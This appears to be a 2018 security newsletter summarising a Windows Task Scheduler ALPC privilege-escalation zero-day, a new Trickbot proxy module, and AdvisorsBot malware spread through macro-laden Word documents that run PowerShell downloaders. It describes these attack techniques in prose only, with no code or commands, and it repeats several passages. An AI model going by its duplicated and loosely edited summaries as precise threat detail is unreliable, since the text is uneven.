19th Ave New York, NY 95822, USA

Insight Weekly Security News Letter-29-Aug-2018

A security researcher has publicly disclosed the details of a previously unknown zero-day vulnerability in the Microsoft's Windows operating system that could help a local user or malicious program obtain system privileges on the targeted machine.

A New Zero-Day Vulnerability Found on Windows Machines:

A security researcher has publicly disclosed the details of a previously unknown zero-day vulnerability in the Microsoft’s Windows operating system that could help a local user or malicious program obtain system privileges on the targeted machine.

The zero-day flaw has been confirmed working on a “fully-patched 64-bit Windows 10 system.”

How it is working:

The vulnerability is a privilege escalation issue which resides in the Windows’ task scheduler program and occurred due to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

The revelation of the Windows zero-day came earlier today from a Twitter user with online alias SandboxEscaper, who also posted a link to a Github page hosting a proof-of-concept (PoC) exploit for the privilege escalation vulnerability in Windows.

Impact

According CERT/CC, the zero-day flaw, if exploited, could allow local users to obtain elevated (SYSTEM) privileges.

The impact of the vulnerability is limited with a CVSS score of 6.4 to 6.8, but the PoC exploit released by the researcher could potentially help malware authors to target Windows users.

Microsoft is likely to patch the vulnerability in its next month’s security Patch Tuesday, which is scheduled for September 11.

Banking Malware With New Variant – Trickbot

While Trickbot has historically targeted the financial industry, it has now expanded its targeting of other industries via its account-checking activities, according to fresh analysis.

Security researchers discovered a new module called spreader_x86.dll that contains two files, SsExecutor_x86.exe and screenLocker_x86.dll that form part of Trickbot’s new arsenal.

The Malware’s evasion capabilities by attempting to add a link to the trojan’s startup path by taking over registry use profiles to maintain persistence

How it Works?

The gang account-checking operation requires a steady stream of new and ‘clean’ proxies to make sure their activities wouldn’t get automatically blocked by companies automatic IP origin anti-fraud systems. Therefore, their existing infections are turned into account-checking proxies.

Impact:

A successful attack can be devastating to both a company’s finances and reputation, especially when it comes to threats that directly affect customers and shareholders.

Remediation:

  • Track any suspicious activity such as C&C and traffic from malicious URL’s with collecting logs of the network.
  • Track any suspicious activity such as C&C and traffic from malicious URL’s with collecting logs of the network.

Reference:

https://www.infosecurity-magazine.com/news/trickbot-evolves-with/

Newly discovered AdvisorsBot Malware actively distributing by threat actor TA555 to target Hotels, Restaurants, and Telecommunications departments using a malicious word document.

This Malware spreading in the various form via email with a fake content and trick victims to open it infect the victims and steal the sensitive data.

Researchers observers that the AdvisorsBot Malware spreading in 3 different form, the first one has appeared via email to that target hotels, the second one is targeting restaurant, the third one mimics as a resume with the malicious macro document to attack telecommunications.

All the targeting email contain macros and the attack trick users to enable the macro that executes a PowerShell command to download and execute the AdvisorsBot Malware.

later threat actor shifted the technique that helps to download another PowerShell script when the PowerShell command gets executed.

AdvisorsBot Malware Infection Technique

Attackers using many junk code such as extra instructions, conditional statements, and loops to strengthen the anti-analysis techniques that makes difficult to analyze the malware.

Impact:

Finally, an attacker using fingerprinting module being sent from a C&C server and the command will perform stealing activities such as Takes a screenshot, Extracts Microsoft Outlook account details and other malicious activities.

Reference:

https://gbhackers.com/advisorsbot-malware-attack/

Attackers using many junk code such as extra instructions, conditional statements, and loops to strengthen the anti-analysis techniques that makes difficult to analyze the malware.

Leave a comment